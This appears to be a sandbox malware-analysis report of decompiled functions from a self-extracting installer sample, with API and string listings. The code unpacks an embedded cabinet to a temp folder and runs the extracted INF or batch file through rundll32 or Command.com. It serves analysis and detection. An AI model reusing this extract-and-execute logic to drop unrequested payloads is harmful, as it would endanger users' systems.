				_v1564 = _a4;
				_v1560 = _a8;
				E00381680( &_v528, 0x104, __ecx);
				if(_v528 != 0x22) {
					_t135 = " ";
					_t53 =  &_v528;
				} else {
					_t135 = "\"";
					_t53 =  &_v527;
				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00381A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00381781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					E0038658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00381680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E003866C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E003866C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00381680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00381781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E003816B3( &_v1552, 0x400, " ");
										E003816B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00382AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E0038171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00381A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00381A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E003844B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0x389120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0x381140, _t156, 8,  &_v268) == 0) {
										 *0x389a34 =  *0x389a34 & 0xfffffffb;
										if( *0x389a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E0038171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0x389a34 =  *0x389a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00381680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00381680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00386CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}

0x00381af3
0x00381afa
0x00381b07
0x00381b09
0x00381b1a
0x00381b20
0x00381b2c
0x00381b3b
0x00381b40
0x00381b2e
0x00381b2e
0x00381b33
0x00381b33
0x00381b46
0x00381b4c
0x00381b52
0x00381b57
0x00381b5d
0x00381b61
0x00381b9f
0x00381b9f
0x00381bb1
0x00381bc2
0x00000000
0x00381b63
0x00381b63
0x00381b65
0x00381b68
0x00381b68
0x00381b6a
0x00381b6b
0x00381b6f
0x00381b74
0x00000000
0x00000000
0x00381b76
0x00381b7b
0x00381b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00381b8c
0x00381b8c
0x00381b98
0x00381bc7
0x00381bc9
0x00381bcc
0x00381bd3
0x00381d75
0x00381d76
0x00381d78
0x00381d7f
0x00381e05
0x00381e09
0x00000000
0x00000000
0x00381e12
0x00381e1b
0x00381e73
0x00381e21
0x00381e21
0x00381e28
0x00381e37
0x00381e3e
0x00381e52
0x00381e60
0x00381e60
0x00381e3e
0x00381e79
0x00381e7b
0x00381e84
0x00000000
0x00381d9b
0x00381d9b
0x00381da0
0x00381da2
0x00381da5
0x00381da5
0x00381da7
0x00381da8
0x00381dac
0x00381dae
0x00381db4
0x00381db7
0x00381db7
0x00381db9
0x00381dba
0x00381dbe
0x00381dc3
0x00381dce
0x00381dd2
0x00381deb
0x00000000
0x00381df0
0x00000000
0x00381dd2
0x00381bf7
0x00381bfe
0x00381c07
0x00381d55
0x00381d5a
0x00381d5b
0x00381d5d
0x00381d5e
0x00000000
0x00381c1b
0x00381c1b
0x00381c20
0x00381c2c
0x00381c33
0x00381c38
0x00381c3a
0x00381c3a
0x00381c40
0x00381c4b
0x00381c4b
0x00381c5d
0x00381c61
0x00381dd4
0x00381dd4
0x00381dd6
0x00381ddb
0x00381ddc
0x00381dde
0x00381d64
0x00381d64
0x00381d67
0x00381d6c
0x00000000
0x00381c67
0x00381c67
0x00381c6d
0x00381c72
0x00381c74
0x00381c74
0x00381c8e
0x00381c99
0x00381cc0
0x00381cf8
0x00381d07
0x00381d23
0x00381d09
0x00381d14
0x00381d1b
0x00381d1b
0x00381d2b
0x00381d2d
0x00381d2d
0x00381d38
0x00381d39
0x00381d46
0x00381cc2
0x00381cc2
0x00381ccc
0x00381cce
0x00381cce
0x00381cdb
0x00381ce6
0x00381cee
0x00381cee
0x00381e89
0x00381e91
0x00381e92
0x00381e94
0x00381e97
0x00381ea4
0x00381ea4
0x00381c61
0x00381c07
0x00381bd3
0x00381b7b

APIs

CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00381BE7
GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00381BFE
LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00381C57
GetPrivateProfileIntA.KERNEL32 ref: 00381C88
GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00381140,00000000,00000008,?), ref: 00381CB8
GetShortPathNameA.KERNEL32 ref: 00381D1B

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Strings

.INF, xrefs: 00381BDB
", xrefs: 00381B25
.BAT, xrefs: 00381D83
AdvancedINF, xrefs: 00381CAE
rundll32.exe %s,InstallHinfSection %s 128 %s, xrefs: 00381D3B
Command.com /c %s, xrefs: 00381D9B, 00381DE8
C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00381BA0
setupapi.dll, xrefs: 00381D23, 00381D3A
setupx.dll, xrefs: 00381D14
Version, xrefs: 00381CB3
Reboot, xrefs: 00381C82
DefaultInstall, xrefs: 00381C74, 00381C87, 00381CCE, 00381CD3, 00381D2D, 00381D39

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
API String ID: 383838535-472070384
Opcode ID: 980c67b9100bcc30bb566308cf699d1348178861ef55881f01a543178d9f10de
Instruction ID: 07f4105f2fef367a110442479b13cda84ece498530b0d4bf3060561a220deeaa
Opcode Fuzzy Hash: 980c67b9100bcc30bb566308cf699d1348178861ef55881f01a543178d9f10de
Instruction Fuzzy Hash: 10A137B1A003186BEB23BB24CC49BFA776D9B41310F1446D5E595A72C1EBB49E8BCB50

Uniqueness

Uniqueness Score: -1.00%

Function 0038597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0038597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x388004; // 0xb25159a8
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x389124 = E00386285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E003844B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x389a34 & 0x00000008;
							if(( *0x389a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x389a38; // 0x0
								_t110 =  *((intOrPtr*)(0x3889e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x389124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0038268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x389a38; // 0x0
							_t110 =  *((intOrPtr*)(0x3889e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3889e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x389a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E003844B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x389124 = E00386285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E003844B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x389124 = E00386285();
					_t66 = 0;
					L33:
					return E00386CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0038597d
0x00385988
0x0038598f
0x0038599a
0x003859a6
0x003859a8
0x003859af
0x003859b9
0x003859dd
0x003859e4
0x003859f1
0x003859fe
0x00385a0b
0x00385a13
0x00385a19
0x00385a1b
0x00385ba1
0x00385baf
0x00385bbd
0x00385bd8
0x00385bde
0x00385be3
0x00385bec
0x00385bf0
0x00385bfc
0x00385c02
0x00385c02
0x00385c02
0x00385c04
0x00385c04
0x00000000
0x00385c04
0x00385a27
0x00385a3a
0x00385a46
0x00385a48
0x00385a4a
0x00000000
0x00000000
0x00385a64
0x00385a6a
0x00385a6c
0x00385abc
0x00385ac2
0x00385ac9
0x00385aca
0x00385aca
0x00385acc
0x00385acc
0x00385acf
0x00385ad1
0x00000000
0x00000000
0x00385ad3
0x00385ad6
0x00385ad8
0x00000000
0x00000000
0x00385ada
0x00385adc
0x00385add
0x00385add
0x00385ae0
0x00000000
0x00000000
0x00000000
0x00385ae0
0x00385ae2
0x00385ae4
0x00385ae6
0x00385ae6
0x00385ae6
0x00385ae9
0x00385aeb
0x00385af0
0x00385af6
0x00385af8
0x00385af9
0x00385af9
0x00385afb
0x00000000
0x00000000
0x00385afd
0x00385aff
0x00385b00
0x00385b03
0x00000000
0x00000000
0x00000000
0x00385b03
0x00385b05
0x00385b08
0x00385b20
0x00385b27
0x00385b52
0x00385b52
0x00385b5b
0x00385b62
0x00385b6b
0x00385b6d
0x00385b76
0x00385b7d
0x00385b83
0x00385b7f
0x00385b7f
0x00385b7f
0x00385b6f
0x00385b72
0x00385b72
0x00385b85
0x00385b98
0x00385b9e
0x00385b87
0x00385b8f
0x00385b8f
0x00000000
0x00385b85
0x00385b29
0x00385b33
0x00000000
0x00000000
0x00385b35
0x00385b48
0x00385b4a
0x00000000
0x00385b4a
0x00385b0f
0x00385b16
0x00000000
0x00385b16
0x00385a7c
0x00385a8a
0x00385aa5
0x00385aab
0x00000000
0x003859bb
0x003859c0
0x003859c7
0x003859d1
0x003859d6
0x00385c05
0x00385c14
0x00385c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003859A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 003859AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00385A13
MulDiv.KERNEL32(?,?,00000400), ref: 00385A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00385A64
memset.MSVCRT ref: 00385A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00385A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00385AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00385BFC

Part of subcall function 003844B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00384518
Part of subcall function 003844B9: MessageBoxA.USER32(?,?,lega,00010010), ref: 00384554

Part of subcall function 00386285: GetLastError.KERNEL32(00385BBC), ref: 00386285

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: dd2ecae57fdd47a4c3f0bb74f195593277619704e7550dc573c255723b7d2518
Instruction ID: da516e295a7b623d2e955c6a12cd22a795a61a92cc9e067849df68e118fc21bf
Opcode Fuzzy Hash: dd2ecae57fdd47a4c3f0bb74f195593277619704e7550dc573c255723b7d2518
Instruction Fuzzy Hash: 97718FB190070CAFEB17EB64CC89BFA77ADEB48344F5440EAF50596140EA349E848B61

Uniqueness

Uniqueness Score: -1.00%

Function 00384FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00384FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x389144 = E0038468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x389140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x388584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x388584, 0x841), 5); // executed
				}
				_t10 = E00384EFD(0, 0); // executed
				if(_t10 != 0) {
					__imp__#20(E00384CA0, E00384CC0, E00384980, E00384A50, E00384AD0, E00384B60, E00384BC0, 1, 0x389148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x389148; // 0x0
						_t24 =  *0x388584; // 0x0
						E003844B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x381140, 0, E00384CD0, 0, 0x389140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x388584; // 0x0
					E003844B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x389140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x389140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x3891d8; // 0x0
						if(_t47 == 0) {
							E003844B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x388a38 & 0x00000001) == 0 && ( *0x389a34 & 0x00000001) == 0) {
						SendMessageA( *0x388584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00384fe0
0x00384fe6
0x00384ff9
0x0038500d
0x00385013
0x0038501a
0x00385163
0x00385163
0x00385020
0x00385027
0x00385037
0x00385051
0x00385051
0x00385057
0x0038505e
0x003850a7
0x003850ad
0x003850b4
0x003850e8
0x003850e8
0x003850ee
0x003850ff
0x00385104
0x00385106
0x00000000
0x00385106
0x003850cd
0x003850d3
0x003850da
0x00000000
0x00000000
0x003850dd
0x003850e6
0x00000000
0x00000000
0x00000000
0x00385060
0x00385060
0x00385070
0x00385075
0x00385107
0x00385107
0x0038510e
0x00385111
0x00385117
0x00385117
0x0038511f
0x00385121
0x00385127
0x00385135
0x00385135
0x00385127
0x00385141
0x00385159
0x00385159
0x00000000
0x0038515f

APIs

Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846A0
Part of subcall function 0038468F: SizeofResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846A9
Part of subcall function 0038468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003846C3
Part of subcall function 0038468F: LoadResource.KERNEL32(00000000,00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846CC
Part of subcall function 0038468F: LockResource.KERNEL32(00000000,?,00382D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003846D3
Part of subcall function 0038468F: memcpy_s.MSVCRT ref: 003846E5
Part of subcall function 0038468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003846EF

FindResourceA.KERNEL32(00000000,CABINET,0000000A), ref: 00384FFE
LoadResource.KERNEL32(00000000,00000000), ref: 00385006
LockResource.KERNEL32(00000000), ref: 0038500D
GetDlgItem.USER32(00000000,00000842), ref: 00385030
ShowWindow.USER32(00000000), ref: 00385037
GetDlgItem.USER32(00000841,00000005), ref: 0038504A
ShowWindow.USER32(00000000), ref: 00385051
FreeResource.KERNEL32(00000000,00000000,00000010,00000000), ref: 00385111
SendMessageA.USER32(00000FA1,00000000,00000000,00000000), ref: 00385159

Strings

CABINET, xrefs: 00384FE6, 00384FF7
*MEMCAB, xrefs: 003850C7

Memory Dump Source

Source File: 00000000.00000002.393331065.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.393323265.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393342870.0000000000388000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.393350595.000000000038C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_plEnknXWQD.jbxd

Similarity

API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
String ID: *MEMCAB$CABINET
API String ID: 1305606123-2642027498
Opcode ID: 5f34c4ef2cdf96c1106472fcc496c1e1b3194f90dd1deebd2efd87313313c781
Instruction ID: fa707e6d9488e68064173937e69fbbdc4f03c9d337a37f7364207e9eba6eb87f
Opcode Fuzzy Hash: 5f34c4ef2cdf96c1106472fcc496c1e1b3194f90dd1deebd2efd87313313c781
Instruction Fuzzy Hash: DB3109B0780702BBEB237B61AC8DFB7369DA744B55F0504D6F902A6691DAB88C008760

Uniqueness

Uniqueness Score: -1.00%

Function 00382F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00382F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x388004; // 0xb25159a8
				_v8 = _t9 ^ _t46;
				if( *0x388a38 != 0) {
					L5:
					_t11 = E00385164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E00386CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E003855A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E0038658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x38a288("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x388a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x388a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x388d48 & 0x000000c0;
									if(( *0x388d48 & 0x000000c0) == 0) {
										_t41 =  *0x389a40; // 0x3, executed
										_t26 = E0038256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x388a24; // 0x0
									 *0x389a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x388a38;
										if( *0x388a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E00384169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x389a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E00383BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x388a24; // 0x0
										goto L26;
									}
								}
								_t27 = E00383B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E003844B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x389124 = E00386285();
							goto L16;
						}
						_t59 =  *0x389a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E0038621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x388a24;
				if( *0x388a24 != 0) {
					L4:
					_t34 = E00383A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E003851E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x388a38;
				if( *0x388a38 != 0) {
					goto L5;
				}
				goto L4;
			}

0x00382f1d
0x00382f28
0x00382f2f
0x00382f3d
0x00382f6c
0x00382f6c
0x00382f71
0x00382f73
0x00383041
0x00383041
0x00383043
0x00383053
0x00383053
0x00382f79
0x00382f80
0x00000000
0x00382f86
0x00382f86
0x00382f93
0x00382f9e
0x00382fa0
0x00382fa6
0x00382fb8
0x00382fba
0x00382fbe
0x00382fc6
0x00382fcc
0x00382fd4
0x00382fd6
0x00382fd8
0x00382fe0
0x00382fe6
0x00382fee
0x00382ff0
0x00382ff5
0x00382ff5
0x00382fee
0x00382fd4
0x00382ff8
0x00382ffe
0x00383004
0x00383017
0x0038301c
0x00383024
0x00383054
0x0038305a
0x00383065
0x00383065
0x0038306c
0x0038306e
0x00383075
0x0038307a
0x0038307a
0x0038307c
0x00383081
0x00383087
0x00383089
0x003830a1
0x003830a1
0x003830a9
0x003830ab
0x003830ad
0x003830af
0x003830af
0x003830ad
0x003830b6
0x00000000
0x0038308b
0x0038308b
0x00383091
0x00000000
0x00000000
0x00383093
0x00383098
0x0038309a
0x00000000
0x00000000
0x0038309c
0x00000000
0x0038309c
0x00383089
0x0038305c
0x00383061
0x00383063
0x00000000
0x00000000
0x00000000
0x00383063
